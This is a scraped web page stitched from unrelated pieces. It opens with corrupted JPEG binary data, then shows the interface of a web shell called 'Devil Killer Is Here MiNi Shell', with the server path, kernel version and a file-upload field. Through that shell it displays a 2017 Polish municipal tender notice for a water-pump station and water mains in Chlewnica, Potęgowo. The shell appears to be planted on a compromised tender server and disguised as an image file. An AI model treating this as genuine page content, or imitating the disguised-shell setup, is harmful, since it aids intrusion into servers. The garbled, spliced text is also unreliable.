JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170419/68442-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.potegowo.pl' target='_blank'>http://www.bip.potegowo.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 68442 - 2017
              z dnia 2017-04-19 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Potęgowo: Budowa hydroforni w Chlewnicy i sieci wodociągowej dla terenu inwestycyjnego<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Potęgowo, krajowy numer identyfikacyjny
              77097984900000, ul.
              ul. Kościuszki 
              5,
              76230  
              Potęgowo, woj.
              pomorskie, państwo
              Polska, tel.
              598 115 072, e-mail
              ue@potegowo.pl, faks
              598 115 072.
              <br />
              Adres strony internetowej (URL): www.potegowo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.potegowo.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie papierowej<br />
                Adres:
                <br />Urząd Gminy Potęgowo, ul. Kościuszki 5, 76-230 Potęgowo</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa hydroforni w Chlewnicy i sieci wodociągowej dla terenu inwestycyjnego<br /><b>Numer referencyjny: </b>ZP.271.8.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część I: 

- Lokalizacja: miejscowość Chlewnica, działka nr 24/1 obręb Chlewnica, gmina  Potęgowo, powiat słupski.

 Przedmiotem zamówienia jest:
1. Likwidacja obudowy podziemnej i urządzeń studni Nr 1: 
Studnia nr 1 znajduje się na działce n 24/1 obręb Chlewnica. Studnia odwiercona prawdopodobnie w latach 60-tych, brak danych wykonawcy otworu, jego głębokości, wydajności oraz konstrukcji. Informacje dotyczące otworu są oparte na rozpoznaniu hydrogeologicznym. Zakłada się, że otwór został wykonany do głębokości ok. 50 m, kolumna filtrowa posadowiona została na głębokości ok. 50,0 m. Do likwidacji otworu nr 1 należy przystąpić po wykonaniu obudowy i montażu urządzeń studni nr 2 i 3. Przestrzeń po obudowie studni zasypać gliniastym urobkiem. Na powierzchni wykonać betonową płytę informacyjną. Prace powyższe będą prowadzone w oparciu o operat wodnoprawny i decyzję pozwolenia na likwidację urządzeń wodnych. Po zakończeniu robót związanych z likwidacją otworu nr 1 zostanie sporządzona dokumentacja geologiczna zgodnie z Rozporządzeniem Ministra Środowiska z dnia 15 grudnia 2011 r. w sprawie szczegółowych wymagań dotyczących innych dokumentacji geologicznych (Dz.U. nr 282 poz. 1656)
2.Montaż obudowy naziemnej i urządzeń do poboru wody otworu studni Nr 2 i 3:
Zakres prac obejmuje przygotowanie do eksploatacji wykonanych w I ETAPIE inwestycji otworów o głębokości ok 90 m. Wykonane otwory studzienne nr 2 (podstawowy) i nr 3(awaryjny) zostaną wyposażone w obudowy naziemne i urządzenia do poboru wody wraz z instalacją pomp głębinowych, dobranych odpowiednio do wymagań inwestora. Obudowa  składa się z podstawy betonowej zbrojonej oraz z pokrywy wykonanej z laminatu poliestrowo  szklanego w całości wypełnionej pianką poliuretanową stanowiącą ocieplenie. Obudowa  wyposażona w mechanizm zamykający, kominek wentylacyjny oraz ogrzewanie elektryczne. Pompę głębinową należy dobrać w taki sposób aby uzyskać wydajność otworu Q = 75,0 m 3 /h  oraz wysokość podnoszenia ok. 100 m. Głębokość zawieszenia pompy określa się na 40 m p.p.t.. Po zakończeniu prac należy zamontować w otworze czujnik, który pozwoli ochronić pompy przed suchobiegiem. Do studni nr 2 i 3 należy doprowadzić zasilanie energetyczne.     

- Wykonawca zobowiązany jest do zawarcia umów z gestorami sieci (woda , energia) przed rozpoczęciem robót.
- Obsługa geodezyjna i inwentaryzacja powykonawcza należy do obowiązków Wykonawcy robót.
- Prace i roboty związane z wykonaniem w/w robót należy skoordynować z realizacją jednocześnie wykonywanych robót budowy budynku hydroforni i sieci wodociągowej. 
- UWAGA: Przedmiotem zamówienia jest II ETAP z załączonej dokumentacji tj. części opracowań dotyczące: Likwidacji obudowy i urządzeń studni Nr 1 oraz montażu obudowy i urządzeń otworów Nr 2 i 3.

Część II: 

Zadanie Nr 1: Budowa hydroforni i sieci wodociągowej w Chlewnicy:

- Lokalizacja: miejscowość Chlewnica działki nr 24/1; 25/1; 26/1; 28/1 obręb Chlewnica i działka nr 767 obręb Potęgowo, gmina Potęgowo, powiat słupski.

1) Budowa sieci wodociągowej  o całkowitej długości L = 668,20 mb, 
wykonana: z rur polietylenowych (PE, PEHD) 100 o ciśnieniu nominalnym PN 10 bar (1,0 MPa) SDR17, wraz z niezbędnymi kształtkami i łącznikami. 
Wcinka do istniejącej sieci wraz z przyłączem z rury PE 40 o długości L=50,00 mb.
Przejście rurociągu pod drogą krajowa nr 6 z rur PE 100 RC PN 16 SDR 11 fi 225,  w rurze ochronnej  stalowej, wykonanej metoda przewiertu, prostopadle do osi drogi. Przewiert w miejscowości Chlewnica w km: 241 + 910 na terenie działki drogowej nr 28/1 obręb Chlewnica. Projektowany przewiert należy wykonać zgodnie z warunkami określonymi w decyzji GDDKiA Oddział w Gdańsku z dnia 09.12.2016. 
2)Wyposażenie budynku hydroforni:
  3 hydrofory o wym. 150x300 cm i pojemności 5.000 litrów każdy.  Zainstalowane zbiorniki będą pracować w zakresie ciśnień p min=0,3 MPa i p max=0,45MPa. 
- sprężarka tłokowa o mocy 2x3 kW, ciśnieniu nom. 8 bar i wydajności 670l/min ze zbiornikiem 400 l.
- chlorator o parametrach: wydajność max = 0,19l/min; max ciśnienie  0,6 MPa; moc silnika 0,25 kW
- rurociągi technologiczne fi 150   200 mm,
- zlew ze stali nierdzewnej,
- instalacje wodociągowe wewnętrzne i zewnętrzne
- instalacje elektryczne wewnętrzne i zewnętrzne z istniejącego przyłącza, zasilającego obecną hydrofornię.
3) Budynek hydroforni
Wyburzenie istniejącego budynku hydroforni, rozbiórka ogrodzenia w obrębie istniejącego budynku hydroforni. Budowa nowego budynku parterowego, w rzucie prostokąta, o powierzchni 66m2.
Budynek posadowiony na ławach fundamentowych żelbetowych z betonu B25, wewnątrz budynku znajdują się pyty fundamentowe  fundamenty pod maszyny. Fundamenty izolowane, ściany fundamentowe murowane z bloczków betonowych, zaizolowane, ocieplone z wyprawą tynkiem mozaikowym. Budynek wykonany w technologii murowanej, z bloczków gazobetonowych gr. 24cm, ocieplony z zewnątrz styropianem gr. 20cm, z wyprawą tynkarską w technologii lekkiej-mokrej. Strop drewniany izolowany i ocieplony wełną mineralną gr. 25cm. Wewnątrz tynki zwykłe cem-wap, malowane na biało. Sufit w formie obudowy z płyt gips-karton mocowanych do konstrukcji stropu, malowany na biało.  Stolarka okienna oraz parapety  PCV. Drzwi wejściowe stalowe. Dach w konstrukcji drewnianej , z pokryciem z blacho dachówki. Obróbki blacharskie, parapety, orynnowanie  z blachy stalowej powlekanej. Wokół budynku opaska z płytek betonowych 50x50x7. W planie zagospodarowania ogrodzenie z siatki metalowej, brama wjazdowa i furtka  oraz nawierzchnia utwardzona z kamienia łamanego, na podbudowie z piasku.
- Wszystkie prace należy wykonać zgodnie z załączoną dokumentacją.  


Zadanie Nr 2: Wielofunkcyjny ośrodek przemysłowo  usługowy w Potęgowie  (Budowa sieci wodociągowej ETAP I):  

- Lokalizacja: miejscowość Potęgowo działki nr 767; 768; 758; 718; 719 obręb Potęgowo, gmina Potęgowo, powiat słupski.

Budowa sieci wodociągowej I Etap w ramach zadania inwestycyjnego  pn.: Budowa uzbrojenia terenu dla Wielofunkcyjnego Ośrodka Przemysłowo  Usługowego w Potęgowie: sieci i przyłącza wodociągowe (część). 
Zakres zadania obejmuje budowę sieci wodociągowej  odcinek W-62-W-75 i W62-W62.7.  Zewnętrzna sieć wodociągowa o całkowitej długości L = 332,50 mb, wykonana: z rur polietylenowych (PE, PEHD) o ciśnieniu nominalnym PN 10 bar (1,0 MPa) SDR17, wraz z niezbędnymi kształtkami i łącznikami. 
- Rury o średnicy zewnętrznej:
125 mm  83,0 mb;
110 mm  233,0 mb;
90 mm  16,50 mb.
- Sieć wodociągowa  uzbrojona w zasuwy klinowe DN 80, hydranty nadziemne DN80  - 4 kpl.
- Przejścia rurociągów pod drogami w rurach ochronnych stalowych lub z tworzywa sztucznego.  
- UWAGA: przedmiotem zamówienia jest I ETAP z załączonej dokumentacji tj. części opracowań zgodnie z załączoną dokumentacją i przedmiarem robót. 
- Wszystkie prace należy wykonać zgodnie z załączoną dokumentacją (w części która dotyczy)
- Do zadań Wykonawcy robót należy: obsługa geodezyjna i inwentaryzacja powykonawcza, uzgodnienie i opłata za zajęcia pasa drogowego, uzgodnienie z ZE zwiększenia mocy energii elektrycznej w hydroforni wg potrzeb, uzgodnienie wejścia na teren właścicieli nieruchomości.
<br /><br /><b>II.5) Główny kod CPV: </b>45255110-3<br /><b> Dodatkowe kody CPV:</b>45232150-8,
                45200000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/11/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a) Zamawiający określa warunek w zakresie doświadczenia zawodowego: 
- dla części I: wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert co najmniej 2 zamówień polegających na wykonaniu otworów do poboru wody o głębokości min. 60 m każdy i wydajności otworu studziennego min. Q=50 m3/h każdy, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie); 
- dla części II: wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert co najmniej 2 zamówień polegających na budowie sieci wodociągowej o zakresie każdego z zadań min. 500 mb, w tym wykonanie przynajmniej w jednym z zamówień hydroforni, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie);
b) Zamawiający określa warunek w zakresie potencjału kadrowego, tj.:
- dla części I: dysponowanie min. 1 osobą posiadającą odpowiednie uprawnienia do kierowania robotami wiertniczymi o głębokości min. 50 m, wydane przez właściwy Okręgowy Urząd Górniczy lub Marszałka Województwa;
- dla części II: dysponowanie min. 1 osobą do kierowania budową, mogącą wykonywać samodzielne funkcje techniczne w budownictwie, posiadającą  uprawnienia  budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, posiadającą min. 5-letnie doświadczenie zawodowe w kierowaniu budowami lub robotami oraz min. 1 osobą do kierowania robotami, posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, posiadającą min. 5-letnie doświadczenie zawodowe w kierowaniu budowami lub robotami
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał kadrowy);
W/w osoby powinny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994r. Prawo Budowlane (tekst jedn. Dz.U. z 2013 r. poz. 1409 ze zm.) oraz z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jedn. Dz. U z 2014 r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.  
Zgodnie z art. 12 a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust.1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity Dz. U. 2008. 63.394 ze zm.).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich;
2) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument, potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich;
3) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich;
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 8.2 1), 2), i 3) SIWZ Wykonawca postępuje zgodnie z § 7 ust. 1 pkt 2  rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. 2016 r. poz. 1126), tzn. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
- nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);
- nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
</div><b>
